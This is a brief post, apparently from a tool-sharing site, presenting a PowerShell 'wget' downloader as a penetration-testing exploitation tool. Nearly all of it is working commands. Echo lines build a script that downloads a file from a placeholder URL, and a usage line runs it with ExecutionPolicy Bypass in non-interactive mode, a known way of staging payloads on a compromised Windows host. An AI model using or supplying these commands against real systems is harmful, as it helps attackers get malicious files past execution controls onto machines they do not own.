Title: wget-ps1- exploitation tool used and required in Penetration TestingAuthor: ajayverma
Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)---]" >> wget.ps1
echo $file = "[---saved file name---]" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1



Submitted On: 2019-06-26 09:47:36